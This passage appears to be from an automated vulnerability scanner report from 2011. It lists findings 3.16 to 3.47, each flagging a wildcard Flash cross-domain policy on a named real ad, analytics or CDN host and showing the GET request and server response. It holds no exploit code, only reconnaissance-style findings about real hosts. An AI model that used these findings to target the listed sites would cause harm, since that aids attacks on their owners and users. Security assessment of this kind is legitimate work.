Expires: Tue, 06 Sep 2011 11:58:57 GMT
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:58:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.16. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:44:56 GMT
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.17. http://cimage.adobe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimage.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimage.adobe.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "5e218bdd5fdbe8b9035e9db6fa4ff6d0:1303309038"
Last-Modified: Wed, 20 Apr 2011 14:17:18 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
xserver: www4
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: comcastresidentialservices.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:22:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.20. http://cr0.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 305
Cache-Control: max-age=3600
Date: Tue, 06 Sep 2011 12:49:50 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.21. http://d.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.yimg.com

Response

HTTP/1.0 200 OK
Date: Fri, 02 Sep 2011 12:24:58 GMT
Cache-Control: max-age=315360000
Expires: Mon, 30 Aug 2021 12:24:58 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 346877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.22. http://e.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 05:38:35 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 05:38:35 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 25877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.23. http://ec.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 491413
Date: Tue, 06 Sep 2011 12:48:17 GMT
Expires: Wed, 07 Sep 2011 20:18:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.24. http://ehg-verizon.hitbox.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Tue, 06 Sep 2011 12:50:54 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.25. http://event.adxpose.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Tue, 06 Sep 2011 12:45:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.26. http://event.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:17 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=70
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.27. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.28. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:25 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.29. http://iar.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://iar.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: iar.worthathousandwords.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:35:21 GMT
Connection: close
Content-Length: 305

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:56 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.32. http://int.teracent.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310681767000"
Last-Modified: Thu, 14 Jul 2011 22:16:07 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://integrate.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.34. http://l.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:08:15 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 12:08:15 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 1294
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.35. http://landing.optionshouse.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: landing.optionshouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 00:28:46 GMT
Accept-Ranges: bytes
ETag: "0734ba92a40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:15 GMT
Connection: close
Content-Length: 101

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.36. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:26 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://metrics.scottrade.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
xserver: www39
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.38. http://metrics.vonage.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.39. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "c68005-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=997452
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.40. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

3.41. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.42. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://presence.apizone.betaregion.oberon-media.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: presence.apizone.betaregion.oberon-media.com

Response

HTTP/1.0 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 15 Mar 2007 15:40:00 GMT
Accept-Ranges: bytes
ETag: "0c8dc301867c71:8f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:46:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

3.44. http://query.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:27 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.45. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 11:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.46. http://redirect.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: redirect.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=84
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:57 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.47. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:53:42 GMT
Expires: Sat, 03 Sep 2011 23:42:21 GMT
X-Content-Type-Options: nosniff
